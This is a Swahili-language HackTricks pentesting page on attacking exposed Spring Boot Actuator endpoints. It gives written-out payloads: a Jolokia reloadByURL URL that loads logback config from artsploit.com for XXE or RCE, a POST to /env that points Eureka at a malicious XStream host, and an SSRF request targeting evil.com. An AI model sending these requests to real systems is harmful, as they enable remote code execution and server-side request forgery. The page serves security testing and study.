Spring Actuators
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Spring Auth Bypass
Kutoka https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****
Kutumia Spring Boot Actuators
Angalia chapisho la asili kutoka [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Mambo Muhimu:
- Spring Boot Actuators inasajili mwisho kama
/health
,/trace
,/beans
,/env
, n.k. Katika toleo la 1 hadi 1.4, mwisho haya yanapatikana bila uthibitisho. Kuanzia toleo la 1.5 na kuendelea, tu/health
na/info
hazina hatari kwa default, lakini waendelezaji mara nyingi huondoa usalama huu. - Baadhi ya mwisho za Actuator zinaweza kufichua data nyeti au kuruhusu vitendo vya hatari:
/dump
,/trace
,/logfile
,/shutdown
,/mappings
,/env
,/actuator/env
,/restart
, na/heapdump
.- Katika Spring Boot 1.x, actuators zinasajiliwa chini ya URL ya mzizi, wakati katika 2.x, ziko chini ya njia ya msingi
/actuator/
.
Mbinu za Kutumia:
- Utekelezaji wa Kanuni ya Kijijini kupitia '/jolokia':
- Mwisho wa actuator
/jolokia
unafichua Maktaba ya Jolokia, ambayo inaruhusu ufikiaji wa HTTP kwa MBeans. - Kitendo cha
reloadByURL
kinaweza kutumika kuhamasisha mipangilio ya uandishi kutoka URL ya nje, ambayo inaweza kusababisha XXE ya kipofu au Utekelezaji wa Kanuni ya Kijijini kupitia mipangilio ya XML iliyoundwa. - Mfano wa URL ya kutumia:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml
.
- Mabadiliko ya Mipangilio kupitia '/env':
- Ikiwa Maktaba za Spring Cloud zipo, mwisho wa
/env
unaruhusu mabadiliko ya mali za mazingira. - Mali zinaweza kubadilishwa ili kutumia udhaifu, kama udhaifu wa deserialization wa XStream katika huduma ya Eureka serviceURL.
- Mfano wa ombi la POST la kutumia:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Mipangilio Mingine ya Faida:
- Mali kama
spring.datasource.tomcat.validationQuery
,spring.datasource.tomcat.url
, naspring.datasource.tomcat.max-active
zinaweza kubadilishwa kwa matumizi mbalimbali, kama injection ya SQL au kubadilisha nyuzi za muunganisho wa database.
Taarifa Zaidi:
- Orodha kamili ya actuators za default inaweza kupatikana hapa.
- Mwisho wa
/env
katika Spring Boot 2.x unatumia muundo wa JSON kwa mabadiliko ya mali, lakini dhana ya jumla inabaki sawa.
Mada Zinazohusiana:
- Env + H2 RCE:
- Maelezo kuhusu kutumia mchanganyiko wa mwisho wa
/env
na database ya H2 yanaweza kupatikana hapa.
- SSRF kwenye Spring Boot Kupitia Tafsiri Mbaya ya Njia:
- Usimamizi wa mfumo wa Spring wa vigezo vya matrix (
;
) katika njia za HTTP unaweza kutumika kwa Server-Side Request Forgery (SSRF). - Mfano wa ombi la kutumia:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.